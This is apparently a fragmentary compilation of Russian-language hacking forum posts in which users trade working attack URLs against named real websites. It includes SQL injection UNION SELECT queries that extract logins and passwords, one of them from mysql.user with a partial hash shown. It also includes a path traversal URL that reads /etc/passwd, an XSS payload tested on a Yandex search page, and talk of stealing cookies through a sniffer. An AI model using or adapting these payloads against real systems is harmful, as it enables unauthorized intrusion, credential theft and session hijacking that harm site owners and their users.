Separate names with a comma.
2n0ne, спасибо 2MaSTeR GэN, на запрос вида http://www.vodnik.info/article.php?aid=-1'+select+'<? php system($cmd)...
по крайней мере через load_file они не читаются.. есть еще какие то способы?
я не про то что уязвимость - инклуды а про то можно ли их прочитать.. судя по всему в них валяются данные базы
помогите развить дальше http://www.vodnik.info/article.php?aid=-1'+union+select+1,2,3,4,5,6,7,8,9+/* с помощью такого запроса прочитад passwd...
_http://www.futureplay.org/news.php?id=999+union+select+1,login,3,user_password,5,6,7+from+user/*...
http://www.physics.wustl.edu/Fac/facDisplayPopUp.php?name=../../../../../../etc/passwd
http://www.stchristopherclub.com/sub/pics.php?id=-1+union+select+1,concat(user,0x3a,password),3,4+from+mysql.user/* root:1af55af32fcea9dc :...
я подобрал количество колонок но нет полей для вывода как поступать?
мм... я пока плохо разбираюсь в этом( а какой должен быть код в файле?
но как я туда вставлю ссылку на сниффер? он ведь картинкой! а если я просто путь вставлю то кукисы не придут точнее придут но не кукисы а так мусор
а с яндексом как? не могу чето ему целку вскрыть....
респект! работает
под "сработало" ты имееш ввиду то что куки на сниффер пришли?
уязвимость http://images.yandex.ru/ поиск ввожу </script><script>alert(document.cookie)</script> и появляется алерт пытаюсь сделать скрипт типа...
ну вот опять You have been blocked from entering this site. You have attempted an unknown attack on this site. All of the following...